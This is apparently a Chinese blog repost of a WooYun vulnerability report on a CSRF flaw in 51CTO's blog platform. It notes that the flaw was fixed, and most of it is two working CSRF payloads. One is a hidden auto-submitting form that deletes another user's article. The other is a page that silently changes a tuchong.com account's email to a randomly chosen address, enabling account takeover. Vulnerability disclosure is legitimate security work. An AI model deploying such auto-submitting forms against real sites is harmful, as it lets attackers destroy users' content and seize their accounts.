侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130562 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录

51cto CSRF漏洞

2023-05-15 星期一 / 0 评论 / 0 点赞 / 82 阅读 / 2538 字

http://wooyun.org/bugs/wooyun-2010-052368积极反馈给51CTO修复了。漏洞可以删掉非自己的文章。<form method='post'action='http:

.

http://wooyun.org/bugs/wooyun-2010-052368

积极反馈给51CTO修复了。

漏洞可以删掉非自己的文章。

<form method='post'action='http://crazysmogu.blog.51cto.com/user_index.php?action=delarticle'><input type='text'value='del'name='job'style='display:none!important;display:block;width=0;height=0'/><input type='text'value='1112261'name='selid'style='display:none!important;display:block;width=0;height=0'/></form><script>document.forms[0].submit();</script>


<html>
<body>
<form name="csrf" action="http://tuchong.com/api/user/modify/" method="POST">
<input type=text name=section value="basicinfo"></input>
<script>
var email =['[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]','[email protected]'];
function Rand(arr, len) {
   arr.sort(function () {
       return Math.random()-0.5;
   });
   return arr.slice(0, len);
}
//alert(Rand(email,1));
document.write("<input type=text name=user_email value="+Rand(email,1)+"></input>");
</script>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
.
.


.

广告 广告

评论区